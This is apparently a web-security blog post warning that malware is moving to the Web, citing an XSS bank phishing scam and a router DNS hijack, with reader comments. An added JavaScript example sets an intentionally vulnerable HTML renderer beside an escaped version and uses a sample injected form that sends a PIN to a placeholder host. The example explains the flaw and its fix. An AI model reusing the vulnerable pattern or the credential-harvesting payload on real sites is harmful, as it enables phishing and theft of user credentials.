The future of malware doesn’t belong to our hard disks.
While we’re still trying to harden our PCs against malicious executables by using unprivileged accounts, wrapping our browsers inside sandboxes and trusting antivirus programs, our digital assets are quickly moving to another place: how much of our identity and money is already on the Web? Even better, how much of our identity and money is not available somewhere on the Web yet?

Since most malware is after our identity, our money or both, why shouldn’t it follow the same path?
And if today’s malware mostly runs on Windows because it’s the commonest executable platform, tomorrow’s will likely run on the Web, for the very same reason. Because, like it or not, the Web is already a huge executable platform, and we should start thinking of it this way from a security perspective.

I know my words may sound too speculative, even plain FUD, but real scams and very scary proofs of concept are already here, mocking the “old school” belief that only local execution and privilege escalation are severe threats:

  • Real scam: The ultimate bank phishing using XSS.
    The credential harvesting form has been embedded inside the real bank page, served through a “secure” HTTPS connection with a valid SSL certificate, by exploiting a reflected XSS vulnerability. Absolutely nothing new, and a relatively poorly performed trick too: the attackers could just as easily have chosen to host the whole payload inside their XSS vector itself, making their fraud even stealthier by avoiding the remote inclusion of an external resource from a different domain. But since they didn’t, surely they estimated their way is good enough to work — and it is, much more than any other phishing attempt you’ve seen so far, because this is the real bank site!!!
  • Scary Proof of Concept: Malicious web page hijacking your router.
    You may think you’ve already heard this one: “Just change the default password, it’s basic common sense” you say.
    But this time it’s different: the GNUCITIZEN guys show us how to compromise your router’s DNS settings from the web with no need to log in, by exploiting its “cool” UPnP features through XmlHttpRequest (if an XSS vulnerability is available, as happens in many devices) or Flash (if no XSS is found). And once an attacker owns your router’s DNS, he controls all your LAN, not just your own traffic…
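The pattern behind the first item, as an added example that is not code from the original post: the untrusted value reflected straight into the page next to the output-encoded version that neutralises it. The function names and the constructed sample input are assumptions made for this illustration.

```javascript
// Added example, not code from the original post. It shows why reflected
// input lets attacker-supplied markup become part of a site's own HTTPS
// page, and how contextual output encoding stops it. Function names and
// the sample input are assumptions constructed for this illustration.

// Vulnerable: the query value is concatenated directly into the HTML, so
// any markup it carries is parsed by the browser as part of the real page.
function renderVulnerable(searchTerm) {
  return '<h1>Results for: ' + searchTerm + '</h1>';
}

// Contextual output encoding for HTML text and attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened: identical rendering, but the untrusted value is encoded first.
function renderSafe(searchTerm) {
  return '<h1>Results for: ' + escapeHtml(searchTerm) + '</h1>';
}

// Defender-side check: count element tags a browser would actually parse
// out of the rendered output (the tags an injected form needs to exist).
function countLiveTags(html) {
  return (html.match(/<(form|input|script|iframe)\b/gi) || []).length;
}

// Constructed sample input: a reflected parameter carrying a bogus login
// form, the shape of payload the post describes (placeholder host).
const constructedInput =
  '<form action="https://phish.example/collect"><input name="pin"></form>';

// Returns the tag counts for both renderings so they can be compared.
function demo() {
  return {
    vulnerableTags: countLiveTags(renderVulnerable(constructedInput)), // 2
    safeTags: countLiveTags(renderSafe(constructedInput)),             // 0
    safeHtml: renderSafe(constructedInput),
  };
}

console.log(demo());
```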

Does anybody still believe browsing the Web with Flash and JavaScript promiscuously enabled and no XSS protection is a good idea?

6 Responses to “Malware 2.0 is Now!”

  1. #1 zomo says:

    No doubt, Web is already the main target now. Everything we did with our desktops, we do it now over the web, including commonalities like spreadsheets etc.

  2. #2 Onyx says:

    No I don’t believe in browsing the web without noscript on 24/7 blocking all content by default.

  3. #3 Steve Miller says:

    Great site, but why is the first page wider than my screen, therefore forcing me to horizontally scroll for reading all? (looking at the comments scales it, making it more user friendly.)

    BTW: The Captcha test failed with my freshly installed NoScript. It told me “You’re a human! Please enter the following code in to the text box below:”; there was a window with a random looking string; submit consequently failed.

    Obviously being able to post a comment needs JavaScript; I would have expected that a (rightful) advocate of having them turned off would not use them :-) (No offense! Only an observation; I am sure you have good reasons for using them)

  4. #4 Giorgio says:

    @Steve Miller:
    Thank you for reporting the excessive width of the main page: it was caused by my “Merry XSSMas” post, whose final greeting was a long cryptic URL which couldn’t be wrapped. Now it’s fixed :)

    Regarding my captcha (which is the famous ReCaptcha service), it has a scriptless fallback, which does work: in fact, I’m currently using it to submit this comment.
    Some reasons why it may fail:

    1. You’ve got IFRAMEs disabled (not your case, as you could see the captcha)
    2. You’ve got cookies disabled (you need to accept cookies from, which are used to maintain current captcha state)
    3. You didn’t copy the whole code (admittedly, the textarea size sucks, hiding half of the validation string)

    I wish I could find the time to set up a self-hosted scriptless captcha, but until then I guess I must live with this one…

  5. #5 silveralfa says:

    I can only think of 2 good reasons to go around without your e-armor. 1) To phish for hackers and such, using a program that records attacks, but is not preventing them, on a dedicated “screwing around” kind of PC which is expendable. And then…what could you do with tracing their sources? You might also like to watch the programs compete to do the most damage. 2) To test the effectiveness of anti-whatever programs, having created a truly infested machine for them to play on. I think I know why Java is “Java” script … not only do the coders stay up all night with lots of java, but it “brews” trouble, and causes us to need lots of java whilst fixing the problems!

  6. #6 » You Suck at Web Security riahmat1c says:

    […] The only reason I stumbled into actual web security consciousness was because of some catchy headline in the search results for a totally unrelated query. Gareth’s post about JavaScript hacking immediately appealed to the coder in me. The strange looking mangling of the language was oddly appealing. “How the heck does that still run!”, I thought. It was only after exploring the blog a bit more and the others it linked to did the situation begin to sink in. This was a whole other face of web applications I had never known about. It’s shocking that such a fundamental part had totally escaped me for so long (perhaps some people are just lazy, but I plead ignorance). “if today’s malware mostly runs on Windows because it’s the commonest executable platform, tomorrow’s will likely run on the Web, for the very same reason. Because, like it or not, Web is already a huge executable platform, and we should start thinking at it this way, from a security perspective.” Giorgio Maone […]
